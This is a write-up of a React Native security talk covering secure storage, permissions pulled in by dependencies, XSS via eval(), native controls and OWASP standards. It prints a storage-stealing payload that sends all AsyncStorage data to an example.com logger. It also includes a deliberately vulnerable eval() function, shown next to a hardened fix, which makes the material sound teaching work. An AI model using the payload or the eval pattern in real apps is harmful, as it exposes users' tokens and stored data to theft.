React Native Security: Addressing Typical Mistakes
Julia Potapenko (@julepka), cossacklabs.com
Let's shed light on React Native apps' security and explain some risks and threats developers should address to prevent typical mistakes.
About me
Julia Potapenko, Security Software Engineer at Cossack Labs
Leader of OWASP Zhytomyr Chapter, Ukraine
❤︎ OWASP MASVS/MSTG Project
Cossack Labs: we help companies to protect their sensitive and valuable data.
Secure storage comparison (the header row did not survive extraction; the column labels below are inferred from the row values as iOS Keychain vs. Android Keystore):

                                       iOS Keychain                     Android Keystore
  Stored encrypted                     Yes                              Yes
  Data persists across app reinstalls  Yes                              No
  Hardware-backed encryption           Yes                              Depends on device vendor
  Data decrypted only before usage     Decrypted when device unlocked   Yes
Permissions: on Android the final manifest is merged from the app's own AndroidManifest.xml and the manifest of every dependency, so permissions can be added in multiple files. React Native adds to this: it is common practice to use third-party modules for almost everything, so the merged app ends up requesting permissions nobody on the team asked for. The typical exchange is "I don't need this permission" followed by "the app crashes if I delete it", because some module relies on it.
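An added example (not from the talk or from any React Native project) of tracing where each Android permission in a React Native app comes from before deciding what to remove. The two manifests are constructed samples; in a real project they live under android/app/src/main/ and under node_modules/<module>/android/src/main/. The module name "some-analytics-sdk" is made up.

```javascript
// Constructed sample manifests: the app's own, plus one pulled in by a dependency.
const MANIFESTS = {
  'android/app/src/main/AndroidManifest.xml': `
    <manifest xmlns:android="http://schemas.android.com/apk/res/android">
      <uses-permission android:name="android.permission.INTERNET" />
      <uses-permission android:name="android.permission.CAMERA" />
    </manifest>`,
  'node_modules/some-analytics-sdk/android/src/main/AndroidManifest.xml': `
    <manifest xmlns:android="http://schemas.android.com/apk/res/android">
      <uses-permission android:name="android.permission.INTERNET"/>
      <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
      <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    </manifest>`,
};

// Pull android:name out of every <uses-permission> element. A regex is enough
// for this demo; a real audit should use an XML parser.
function permissionsOf(xml) {
  const re = /<uses-permission\b[^>]*android:name="([^"]+)"/g;
  const names = [];
  let m;
  while ((m = re.exec(xml)) !== null) names.push(m[1]);
  return names;
}

// Map each permission to the manifest files that declare it, so "why does the
// merged APK ask for this?" has an answer before anyone deletes a line.
function permissionOrigins(manifests) {
  const origins = new Map();
  for (const [file, xml] of Object.entries(manifests)) {
    for (const name of permissionsOf(xml)) {
      if (!origins.has(name)) origins.set(name, []);
      origins.get(name).push(file);
    }
  }
  return origins;
}

// Permissions that the app's own source tree never declares: they arrive purely
// through dependency manifests and the manifest merger.
function libraryOnlyPermissions(manifests) {
  const result = [];
  for (const [name, files] of permissionOrigins(manifests)) {
    if (files.every((f) => f.startsWith('node_modules/'))) result.push(name);
  }
  return result.sort();
}

// The line to add to the app manifest to strip a permission a library pulled in
// (needs xmlns:tools="http://schemas.android.com/tools" on <manifest>). Test the
// library afterwards: if it crashes without the permission, replacing the library
// is the fix, not keeping a permission the product does not need.
function removalOverride(name) {
  return `<uses-permission android:name="${name}" tools:node="remove" />`;
}
```

Run `libraryOnlyPermissions(MANIFESTS)` against the real manifests gathered from node_modules and the app; every name it returns is a permission to justify, remove with `removalOverride`, or trace to a module that can be swapped out.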
XSS: in React Native the possibility of XSS is decreased by design (React escapes strings it renders), but XSS is still possible, for example through eval(). The slide's payload:

_reactNative.AsyncStorage.getAllKeys(function(err,result) {
  _reactNative.AsyncStorage.multiGet(result,function(err,result) {
    fetch('http://example.com/logger.php?token='+JSON.stringify(result));
  });
});

It steals all the data from local storage (AsyncStorage) by exploiting an eval-based injection and accessing React Native APIs through the module object the bundler exposes.
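An added example (not from the talk or from any React Native code) that runs the slide's payload end to end and then shows the hardened alternative. AsyncStorage and fetch are replaced by constructed in-memory stand-ins so it runs in plain Node.js; the stored secrets, the allow-listed config keys and the function names are all made up for the demo.

```javascript
// Constructed stand-in for AsyncStorage's callback-style API.
function makeAsyncStorage(seed) {
  const store = new Map(Object.entries(seed));
  return {
    getAllKeys(cb) { cb(null, [...store.keys()]); },
    multiGet(keys, cb) { cb(null, keys.map((k) => [k, store.has(k) ? store.get(k) : null])); },
  };
}

// Constructed stand-in for fetch(): records request URLs instead of sending them.
function makeFetchRecorder() {
  const requests = [];
  const fetch = (url) => { requests.push(url); return Promise.resolve({ ok: true }); };
  return { fetch, requests };
}

// The payload from the slide, unchanged apart from quoting. _reactNative is the
// name the bundler gave the react-native module object in that app's bundle.
const PAYLOAD =
  "_reactNative.AsyncStorage.getAllKeys(function(err,result){" +
  "_reactNative.AsyncStorage.multiGet(result,function(err,result){" +
  "fetch('http://example.com/logger.php?token='+JSON.stringify(result));});});";

// Vulnerable: a string from an untrusted source (server response, deep link,
// WebView message) is passed to eval() and runs with the full privileges and
// scope of the app's own JavaScript. Deliberately insecure; do not copy.
function applyRemoteExpressionVulnerable(expression, env) {
  // Direct eval sees these locals, just as bundled code sees module-scope names.
  const _reactNative = env._reactNative; // eslint-disable-line no-unused-vars
  const fetch = env.fetch;               // eslint-disable-line no-unused-vars
  return eval(expression);               // eslint-disable-line no-eval
}

// Runs the payload against storage seeded with constructed secrets and returns
// the URLs the attacker's fetch() was called with: one request carrying everything.
function demoExfiltration() {
  const storage = makeAsyncStorage({ authToken: 'eyJhbGciOiJIUzI1NiJ9.demo', userId: '42' });
  const net = makeFetchRecorder();
  applyRemoteExpressionVulnerable(PAYLOAD, {
    _reactNative: { AsyncStorage: storage },
    fetch: net.fetch,
  });
  return net.requests;
}

// Hardened: remote input is data, never code. JSON.parse cannot execute
// anything, and an allow-list of keys and value types rejects everything else.
const ALLOWED_FLAGS = new Set(['theme', 'featureX']); // hypothetical config keys
function applyRemoteConfigSafe(json) {
  let parsed;
  try {
    parsed = JSON.parse(json);
  } catch (e) {
    throw new Error('remote config is not valid JSON');
  }
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    throw new Error('remote config must be a JSON object');
  }
  const accepted = {};
  for (const [key, value] of Object.entries(parsed)) {
    if (!ALLOWED_FLAGS.has(key)) throw new Error(`unexpected config key: ${key}`);
    if (typeof value !== 'string' && typeof value !== 'boolean') {
      throw new Error(`unexpected value type for ${key}`);
    }
    accepted[key] = value;
  }
  return accepted;
}
```

The same root cause exists on every path where an attacker-influenced string becomes code: eval(), new Function(), and JavaScript injected into a WebView. The hardened version never evaluates the input at all; it parses it as JSON and keeps only known keys with expected types, which also rejects the payload above and keys like "__proto__".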
Native security controls such as the ones IOSSecuritySuite provides (jailbreak, debugger and tamper detection) are never easy, even for regular iOS and Android teams, and there are no ready-to-go React Native solutions:
a. implement on your own
b. use third-party solutions for each platform and write bridging code
Example: IOSSecuritySuite (https://github.com/securing/IOSSecuritySuite), a Swift library. The chain is Swift ➤ Objective-C ➤ React Native: the Swift code is exposed through an Objective-C bridge (RCT_EXTERN_MODULE / RCTBridgeModule) before JavaScript can call it.
Managing dependencies:
- many dependencies
- additional CI work
- one update triggers another update
- integrating dependency checkers
- updates may be incompatible
- what if there is no fix for a vulnerability?
- architectural changes required
- tight deadlines
OWASP Mobile Application Security Verification Standard (MASVS): https://github.com/OWASP/owasp-masvs
OWASP Mobile Security Testing Guide (MSTG): https://github.com/OWASP/owasp-mstg
From the OWASP MSTG: “Please note that the MSTG focuses primarily on native apps. These are apps built with Java or Kotlin using the Android SDK for Android or built with Swift or Objective-C using the Apple SDKs for iOS. Apps using frameworks such as Nativescript, React-native, Xamarin, Cordova, etc. are not within the main focus of the MSTG. However, some essential controls, such as certificate pinning, have been explained already for some of these platforms.”
Addressing Typical Mistakes
1. Use MASVS requirements.
2. Review JavaScript dependencies' source code to understand the native controls behind them. You need to be able to read all the languages: JavaScript (TypeScript), Objective-C (Swift), Java (Kotlin).
3. Use ASVS and WSTG to cover JavaScript-specific vulnerabilities like XSS.